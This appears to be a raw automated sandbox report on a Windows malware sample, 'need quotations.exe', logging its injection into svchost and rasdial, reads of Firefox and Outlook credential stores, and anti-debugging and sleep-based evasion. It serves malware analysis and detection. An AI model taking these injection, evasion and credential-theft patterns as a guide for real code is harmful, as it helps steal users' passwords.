0_2_0024406B

Source: C:\Users\user\Desktop\need quotations.exe

File created: C:\Users\user\AppData\Local\Temp\autEBE3.tmp

Jump to behavior

Source: need quotations.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\need quotations.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rasdial.exe, 00000006.00000002.4141193170.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2163620884.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2163742746.00000000030C1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: need quotations.exe	ReversingLabs: Detection: 34%
Source: need quotations.exe	Virustotal: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\need quotations.exe "C:\Users\user\Desktop\need quotations.exe"
Source: C:\Users\user\Desktop\need quotations.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\need quotations.exe"
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\need quotations.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\need quotations.exe"	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: need quotations.exe

Static file information: File size 1214976 > 1048576

Source: need quotations.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: need quotations.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: need quotations.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: need quotations.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: need quotations.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: need quotations.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: need quotations.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hyAHqPRvnfCBI.exe, 00000005.00000002.4141616808.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: need quotations.exe, 00000000.00000003.1682034969.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, need quotations.exe, 00000000.00000003.1681755557.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890783925.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1888736048.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.0000000003600000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1982993725.0000000004AE4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1988430083.0000000004C9D000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.1983013485.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1950582197.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: need quotations.exe, 00000000.00000003.1682034969.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, need quotations.exe, 00000000.00000003.1681755557.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1890783925.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1888736048.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.0000000003600000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1982993725.0000000004AE4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1988430083.0000000004C9D000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.1983013485.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1950582197.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.000000000460C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.000000000547C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4141193170.000000000304A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2273790908.000000003765C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.000000000460C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.000000000547C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4141193170.000000000304A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2273790908.000000003765C000.00000004.80000000.00040000.00000000.sdmp

Source: need quotations.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: need quotations.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: need quotations.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: need quotations.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: need quotations.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0025E01E LoadLibraryA,GetProcAddress,

0_2_0025E01E

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026C09E push esi; ret	0_2_0026C0A0
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026C187 push edi; ret	0_2_0026C189
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002AC8BC push esi; ret	0_2_002AC8BE
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00266B05 push ecx; ret	0_2_00266B18
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028B2B1 push FFFFFF8Bh; iretd	0_2_0028B2B3
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026BDAA push edi; ret	0_2_0026BDAC
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026BEC3 push esi; ret	0_2_0026BEC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403100 push eax; ret	1_2_00403102
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D307 push edx; ret	1_2_0040D30E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417333 push ecx; retf	1_2_00417336
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411C05 push esi; iretd	1_2_00411C1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411C13 push esi; iretd	1_2_00411C1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00427C33 push eax; iretd	1_2_00427CA9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00425553 push ds; iretd	1_2_00425554
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D53D push esi; retf	1_2_0040D53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004045F9 push ds; ret	1_2_004045FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418605 push ebp; retf	1_2_00418633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00413FD3 push 8BA57A45h; iretd	1_2_00413FEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0360225F pushad ; ret	1_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036027FA pushad ; ret	1_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx	1_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0360283D push eax; iretd	1_2_03602858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0360135F push eax; iretd	1_2_03601369
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A67EB5 push ecx; retf	5_2_06A67EB8
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A787B5 push eax; iretd	5_2_06A7882B
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A62787 push esi; iretd	5_2_06A627A0
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A62795 push esi; iretd	5_2_06A627A0
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A6F539 push esp; ret	5_2_06A6F541
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A760D5 push ds; iretd	5_2_06A760D6
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A59016 push esi; iretd	5_2_06A59046
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A5517B push ds; ret	5_2_06A55181

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_002A8111
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0025EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0025EB42

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0026123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0026123A

Source: C:\Users\user\Desktop\need quotations.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\need quotations.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\need quotations.exe	API/Special instruction interceptor: Address: 194A60C
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0367096E rdtsc

1_2_0367096E

Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 365			Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 9607			Jump to behavior

Source: C:\Users\user\Desktop\need quotations.exe

Evaded block: after key decision

graph_0-93283

Source: C:\Users\user\Desktop\need quotations.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-93829

Source: C:\Users\user\Desktop\need quotations.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe TID: 6548	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe TID: 6548	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe TID: 6548	Thread sleep time: -63000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe TID: 6548	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe TID: 6548	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 7108	Thread sleep count: 365 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 7108	Thread sleep time: -730000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 7108	Thread sleep count: 9607 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 7108	Thread sleep time: -19214000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00286CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00286CA9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_002860DD
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_002863F9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0028EB60
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028F56F FindFirstFileW,FindClose,	0_2_0028F56F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0028F5FA
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00291B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291B2F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00291C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291C8A
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00291F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00291F94

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0025DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0025DDC0

Source: firefox.exe, 00000007.00000002.2279901857.000001A6B763C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: rasdial.exe, 00000006.00000002.4141193170.000000000304A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4141737173.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\need quotations.exe	API call chain: ExitProcess graph end node			graph_0-93572
Source: C:\Users\user\Desktop\need quotations.exe	API call chain: ExitProcess graph end node			graph_0-92521

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0367096E rdtsc

1_2_0367096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417903 LdrLoadDll,

1_2_00417903

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00296AAF BlockInput,

0_2_00296AAF

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00243D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00243D19

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00273920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00273920

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0025E01E LoadLibraryA,GetProcAddress,

0_2_0025E01E

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_01949248 mov eax, dword ptr fs:[00000030h]	0_2_01949248
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0194A8D8 mov eax, dword ptr fs:[00000030h]	0_2_0194A8D8
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0194A878 mov eax, dword ptr fs:[00000030h]	0_2_0194A878
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]	1_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
